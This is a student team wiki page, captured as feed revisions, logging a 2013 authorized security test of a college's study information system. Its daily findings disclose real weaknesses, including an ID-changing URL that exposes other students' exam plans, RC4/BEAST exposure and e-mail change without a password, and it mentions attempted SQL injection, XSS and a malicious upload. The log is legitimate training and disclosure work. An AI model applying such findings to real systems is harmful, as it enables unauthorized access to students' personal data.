I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62401</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62401"/>
		<updated>2013-04-05T08:25:04Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* IP Feed-back */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
